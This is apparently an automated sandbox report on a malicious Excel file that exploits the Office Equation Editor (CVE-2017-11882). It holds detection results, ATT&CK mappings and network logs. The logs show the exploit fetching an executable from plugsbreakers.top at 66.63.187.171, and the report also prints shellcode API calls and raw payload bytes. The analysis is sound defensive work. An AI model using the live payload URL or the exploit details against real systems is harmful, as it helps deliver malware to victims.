Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO906-645S790768.xlam.xlsx

Overview

General Information

Sample name:PO906-645S790768.xlam.xlsx
Analysis ID:1524794
MD5:29a10a50eb01fe79324c9cd3dc663941
SHA1:a36ccbd34c01fed16e27a53751accab681941c5a
SHA256:ef561a4cdb2a47c93a4b84a825c5ef76cbaf89ae3e1d7bef8034c33e0b8a1c03
Tags:xlamxlsxuser-abuse_ch
Infos:

Detection

Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Document exploit detected (process start blacklist hit)
Office equation editor establishes network connection
Shellcode detected
Sigma detected: Equation Editor Network Connection
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to read the PEB
Document misses a certain OLE stream usually present in this Microsoft Office document type
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Yara signature match

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 3200 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • EQNEDT32.EXE (PID: 3356 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
sheet1.xmlINDICATOR_XML_LegacyDrawing_AutoLoad_Documentdetects AutoLoad documents using LegacyDrawingditekSHen
  • 0xd94aa:$s1: <legacyDrawing r:id="
  • 0xd94d2:$s2: <oleObject progId="
  • 0xd9520:$s3: autoLoad="true"

Exploits

barindex
Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 66.63.187.171, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3356, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163

System Summary

barindex
Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49163, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3356, Protocol: tcp, SourceIp: 66.63.187.171, SourceIsIpv6: false, SourcePort: 80
Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3356, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: PO906-645S790768.xlam.xlsxAvira: detected
Source: http://plugsbreakers.top/voicxe/mynnft.exeVirustotal: Detection: 7%Perma Link
Source: PO906-645S790768.xlam.xlsxReversingLabs: Detection: 66%
Source: PO906-645S790768.xlam.xlsxVirustotal: Detection: 47%Perma Link

Exploits

barindex
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 66.63.187.171 Port: 80Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

Software Vulnerabilities

barindex
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 1_2_035904F5 WinExec,ExitProcess,1_2_035904F5
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 1_2_03590429 LoadLibraryW,URLDownloadToFileW,1_2_03590429
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 1_2_035904AA URLDownloadToFileW,1_2_035904AA
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 1_2_03590515 ExitProcess,1_2_03590515
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 1_2_03590397 URLDownloadToFileW,1_2_03590397
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 1_2_03590443 URLDownloadToFileW,1_2_03590443
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 1_2_0359037E ExitProcess,1_2_0359037E
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 1_2_035903B3 URLDownloadToFileW,1_2_035903B3
Source: global trafficDNS query: name: plugsbreakers.top
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.171:80
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.171:80
Source: global trafficTCP traffic: 66.63.187.171:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.171:80
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.171:80
Source: global trafficTCP traffic: 66.63.187.171:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 66.63.187.171:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 66.63.187.171:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.171:80
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.171:80
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.171:80
Source: global trafficTCP traffic: 66.63.187.171:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.171:80
Source: global trafficTCP traffic: 66.63.187.171:80 -> 192.168.2.22:49163
Source: Joe Sandbox ViewASN Name: ASN-QUADRANET-GLOBALUS ASN-QUADRANET-GLOBALUS
Source: global trafficHTTP traffic detected: GET /voicxe/mynnft.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: plugsbreakers.topConnection: Keep-Alive
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 1_2_03590429 LoadLibraryW,URLDownloadToFileW,1_2_03590429
Source: global trafficHTTP traffic detected: GET /voicxe/mynnft.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: plugsbreakers.topConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: plugsbreakers.top
Source: EQNEDT32.EXE, 00000001.00000002.510778876.00000000002E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://plugsbreakers.top/voicxe/mynnft.exeQHU
Source: EQNEDT32.EXE, 00000001.00000002.510778876.00000000002E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://plugsbreakers.top/voicxe/mynnft.exeiEHT2T
Source: EQNEDT32.EXE, 00000001.00000002.510902224.0000000003590000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://plugsbreakers.top/voicxe/mynnft.exej

System Summary

barindex
Source: sheet1.xml, type: SAMPLEMatched rule: detects AutoLoad documents using LegacyDrawing Author: ditekSHen
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
Source: PO906-645S790768.xlam.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: sheet1.xml, type: SAMPLEMatched rule: INDICATOR_XML_LegacyDrawing_AutoLoad_Document author = ditekSHen, description = detects AutoLoad documents using LegacyDrawing
Source: classification engineClassification label: mal96.expl.winXLSX@2/2@1/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$PO906-645S790768.xlam.xlsxJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR82F4.tmpJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: PO906-645S790768.xlam.xlsxReversingLabs: Detection: 66%
Source: PO906-645S790768.xlam.xlsxVirustotal: Detection: 47%
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: PO906-645S790768.xlam.xlsxInitial sample: OLE indicators vbamacros = False
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3376Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_1-337
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 1_2_0359051C mov edx, dword ptr fs:[00000030h]1_2_0359051C
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid Accounts23
Exploitation for Client Execution
1
Scripting
1
Process Injection
1
Masquerading
OS Credential Dumping1
Virtualization/Sandbox Evasion
Remote ServicesData from Local System2
Non-Application Layer Protocol
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading
1
DLL Side-Loading
1
Virtualization/Sandbox Evasion
LSASS Memory1
File and Directory Discovery
Remote Desktop ProtocolData from Removable Media12
Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Process Injection
Security Account Manager3
System Information Discovery
SMB/Windows Admin SharesData from Network Shared Drive2
Ingress Tool Transfer
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
DLL Side-Loading
NTDS1
Remote System Discovery
Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
PO906-645S790768.xlam.xlsx67%ReversingLabsDocument-Office.Exploit.CVE-2017-11882
PO906-645S790768.xlam.xlsx48%VirustotalBrowse
PO906-645S790768.xlam.xlsx100%AviraEXP/CVE-2017-11882.Gen
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
plugsbreakers.top2%VirustotalBrowse
SourceDetectionScannerLabelLink
http://plugsbreakers.top/voicxe/mynnft.exe7%VirustotalBrowse
NameIPActiveMaliciousAntivirus DetectionReputation
plugsbreakers.top
66.63.187.171
truetrueunknown
NameMaliciousAntivirus DetectionReputation
http://plugsbreakers.top/voicxe/mynnft.exetrueunknown
NameSourceMaliciousAntivirus DetectionReputation
http://plugsbreakers.top/voicxe/mynnft.exejEQNEDT32.EXE, 00000001.00000002.510902224.0000000003590000.00000004.00000020.00020000.00000000.sdmpfalse
    unknown
    http://plugsbreakers.top/voicxe/mynnft.exeiEHT2TEQNEDT32.EXE, 00000001.00000002.510778876.00000000002E3000.00000004.00000020.00020000.00000000.sdmpfalse
      unknown
      http://plugsbreakers.top/voicxe/mynnft.exeQHUEQNEDT32.EXE, 00000001.00000002.510778876.00000000002E3000.00000004.00000020.00020000.00000000.sdmpfalse
        unknown
        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs
        IPDomainCountryFlagASNASN NameMalicious
        66.63.187.171
        plugsbreakers.topUnited States
        8100ASN-QUADRANET-GLOBALUStrue
        Joe Sandbox version:41.0.0 Charoite
        Analysis ID:1524794
        Start date and time:2024-10-03 10:02:21 +02:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 3m 57s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:defaultwindowsofficecookbook.jbs
        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
        Number of analysed new started processes analysed:6
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name:PO906-645S790768.xlam.xlsx
        Detection:MAL
        Classification:mal96.expl.winXLSX@2/2@1/1
        EGA Information:
        • Successful, ratio: 100%
        HCA Information:
        • Successful, ratio: 100%
        • Number of executed functions: 8
        • Number of non-executed functions: 1
        Cookbook Comments:
        • Found application associated with file extension: .xlsx
        • Found Word or Excel or PowerPoint or XPS Viewer
        • Attach to Office via COM
        • Active ActiveX Object
        • Scroll down
        • Close Viewer
        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.
        TimeTypeDescription
        04:04:01API Interceptor282x Sleep call for process: EQNEDT32.EXE modified
        No context
        No context
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        ASN-QUADRANET-GLOBALUShesaphareketi__20241001.exeGet hashmaliciousAgentTeslaBrowse
        • 104.247.165.99
        novo.ppc440fp.elfGet hashmaliciousMirai, MoobotBrowse
        • 185.121.176.226
        Quote List.scr.exeGet hashmaliciousXenoRATBrowse
        • 66.63.168.142
        58ADE05412907F657812BDA267C43288EA79418091.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
        • 66.63.187.123
        New Order.docGet hashmaliciousSnake KeyloggerBrowse
        • 66.63.187.123
        http://telegram.beethovenstore.com/Get hashmaliciousUnknownBrowse
        • 104.247.162.201
        https://83153.cc/Get hashmaliciousUnknownBrowse
        • 27.0.235.36
        0225139776.docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
        • 66.63.187.123
        http://bet938r.com/Get hashmaliciousUnknownBrowse
        • 27.0.235.160
        https://bet958v.com/Get hashmaliciousUnknownBrowse
        • 27.0.235.160
        No context
        No context
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:data
        Category:dropped
        Size (bytes):165
        Entropy (8bit):1.4377382811115937
        Encrypted:false
        SSDEEP:3:vZ/FFDJw2fV:vBFFGS
        MD5:797869BB881CFBCDAC2064F92B26E46F
        SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
        SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
        SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
        Malicious:false
        Reputation:high, very likely benign file
        Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:data
        Category:dropped
        Size (bytes):165
        Entropy (8bit):1.4377382811115937
        Encrypted:false
        SSDEEP:3:vZ/FFDJw2fV:vBFFGS
        MD5:797869BB881CFBCDAC2064F92B26E46F
        SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
        SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
        SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
        Malicious:true
        Reputation:high, very likely benign file
        Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
        File type:Microsoft Excel 2007+
        Entropy (8bit):7.9807482507851
        TrID:
        • Excel Microsoft Office Open XML Format document (35004/1) 81.40%
        • ZIP compressed archive (8000/1) 18.60%
        File name:PO906-645S790768.xlam.xlsx
        File size:736'638 bytes
        MD5:29a10a50eb01fe79324c9cd3dc663941
        SHA1:a36ccbd34c01fed16e27a53751accab681941c5a
        SHA256:ef561a4cdb2a47c93a4b84a825c5ef76cbaf89ae3e1d7bef8034c33e0b8a1c03
        SHA512:91a192057bc8c5dc131567cef6bc698b14b0b0533f3868592732fe6bc94161464eb336d9617a656a598c0522860ae2051bcc5823034da00321794e77e863aa6e
        SSDEEP:12288:TIMD4ybeFnJUQFQtmXo01kvTI3dXQugbXZihxdG3OZLa:NSzCtwozvTI3dvgbpihx43O4
        TLSH:0AF40248B29995E8A7AD81A754C46E3303874010E65F3C693FC7771362C13D68BFAE6E
        File Content Preview:PK........j.AY.h."............[Content_Types].xmlUT...iI.fiI.fiI.f.T.n.0....?..."......C......^z[.k.5_ 7...].M......P .....rv....`.6.FL.DT.t46.......&.B......;,......q..T.....Q..T..z(2&.|.....6.T...../..W.c .TS.!.g.. [..=d...:j..1....d>Q...{.F@J.j .\m.y.Z
        Icon Hash:2562ab89a7b7bfbf
        Document Type:OpenXML
        Number of OLE Files:1
        Has Summary Info:
        Application Name:
        Encrypted Document:False
        Contains Word Document Stream:False
        Contains Workbook/Book Stream:False
        Contains PowerPoint Document Stream:False
        Contains Visio Document Stream:False
        Contains ObjectPool Stream:False
        Flash Objects Count:0
        Contains VBA Macros:False
        Author:Jose Suarez
        Last Saved By:HP
        Create Time:2024-09-30T12:55:35Z
        Last Saved Time:2024-10-01T18:04:35Z
        Creating Application:Microsoft Excel
        Security:0
        Thumbnail Scaling Desired:false
        Contains Dirty Links:false
        Shared Document:false
        Changed Hyperlinks:false
        Application Version:12.0000
        General
        Stream Path:\x1OLe10natIVE
        CLSID:
        File Type:data
        Stream Size:939159
        Entropy:5.886660791012148
        Base64 Encoded:True
        Data ASCII:, . . . R T J . . ( B . 2 . c . . . . . U . i F - . F ! ; . . J @ . d . ? t + j . . . 9 A j S . F . P * D _ g S L . ~ . . . } P H A ' . f ' . . H H # g q . y . . . . . 3 u 1 > . J ' . . . . ^ S [ . . . . W . . . . . . i V ^ ! i / . . M . Q I d . . 9 . . w . . Y R W _ R W k . . # . . . j . . @ . . 4 i . . P R g . . . - R * . . Z X _ Z S [ Z + S . . . $ u 3 [ o | . . Z k . Z 9 Q Y . N . T . o . V . . . / ! . 9 . I 9 z M * . G T t ( . o k } B ' J ^ . d 8 t . L U g u O . z I . t l . N # L . 5 2 f ? - c D E
        Data Raw:e3 fe 2c 04 03 08 52 54 4a 8c 01 08 dd 28 ba c3 42 ba ff f7 d2 8b 32 8b 2e be 63 1b f4 10 81 ee b3 b3 ad 10 8b 06 55 ff d0 05 69 97 eb 46 2d dc 96 eb 46 ff e0 d4 21 3b 92 1a 13 4a 40 00 81 81 64 1a 3f 74 94 89 a6 2b b1 6a 11 db 01 16 39 41 6a dd c0 ff 53 7f 8b 46 06 88 50 2a da 44 b5 5f e1 67 53 bc 4c 12 e3 7e 19 c4 7f fb 90 fe a0 a2 c6 a8 7d 50 e9 48 41 27 06 66 27 1d de 8b 48 a9
        General
        Stream Path:FCHahHyxX8Y8YhCOTAStNXLPRaeQu
        CLSID:
        File Type:empty
        Stream Size:0
        Entropy:0.0
        Base64 Encoded:False
        Data ASCII:
        Data Raw:
        TimestampSource PortDest PortSource IPDest IP
        Oct 3, 2024 10:04:05.566898108 CEST4916380192.168.2.2266.63.187.171
        Oct 3, 2024 10:04:05.572329998 CEST804916366.63.187.171192.168.2.22
        Oct 3, 2024 10:04:05.572412014 CEST4916380192.168.2.2266.63.187.171
        Oct 3, 2024 10:04:05.572630882 CEST4916380192.168.2.2266.63.187.171
        Oct 3, 2024 10:04:05.577610016 CEST804916366.63.187.171192.168.2.22
        Oct 3, 2024 10:04:27.680907011 CEST804916366.63.187.171192.168.2.22
        Oct 3, 2024 10:04:27.681046963 CEST804916366.63.187.171192.168.2.22
        Oct 3, 2024 10:04:27.681061983 CEST4916380192.168.2.2266.63.187.171
        Oct 3, 2024 10:04:27.681269884 CEST4916380192.168.2.2266.63.187.171
        Oct 3, 2024 10:04:27.681269884 CEST4916380192.168.2.2266.63.187.171
        Oct 3, 2024 10:04:27.681328058 CEST804916366.63.187.171192.168.2.22
        Oct 3, 2024 10:04:27.681384087 CEST4916380192.168.2.2266.63.187.171
        Oct 3, 2024 10:04:27.686218977 CEST804916366.63.187.171192.168.2.22
        TimestampSource PortDest PortSource IPDest IP
        Oct 3, 2024 10:04:05.190824986 CEST5456253192.168.2.228.8.8.8
        Oct 3, 2024 10:04:05.548605919 CEST53545628.8.8.8192.168.2.22
        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
        Oct 3, 2024 10:04:05.190824986 CEST192.168.2.228.8.8.80x4f52Standard query (0)plugsbreakers.topA (IP address)IN (0x0001)false
        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
        Oct 3, 2024 10:04:05.548605919 CEST8.8.8.8192.168.2.220x4f52No error (0)plugsbreakers.top66.63.187.171A (IP address)IN (0x0001)false
        • plugsbreakers.top
        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        0192.168.2.224916366.63.187.171803356C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
        TimestampBytes transferredDirectionData
        Oct 3, 2024 10:04:05.572630882 CEST321OUTGET /voicxe/mynnft.exe HTTP/1.1
        Accept: */*
        Accept-Encoding: gzip, deflate
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
        Host: plugsbreakers.top
        Connection: Keep-Alive


        Click to jump to process

        Click to jump to process

        Click to dive into process behavior distribution

        Click to jump to process

        Target ID:0
        Start time:04:03:13
        Start date:03/10/2024
        Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        Wow64 process (32bit):false
        Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
        Imagebase:0x13f800000
        File size:28'253'536 bytes
        MD5 hash:D53B85E21886D2AF9815C377537BCAC3
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:false

        Target ID:1
        Start time:04:04:01
        Start date:03/10/2024
        Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
        Wow64 process (32bit):true
        Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
        Imagebase:0x400000
        File size:543'304 bytes
        MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        Reset < >

          Execution Graph

          Execution Coverage:14.1%
          Dynamic/Decrypted Code Coverage:0%
          Signature Coverage:80.6%
          Total number of Nodes:72
          Total number of Limit Nodes:3
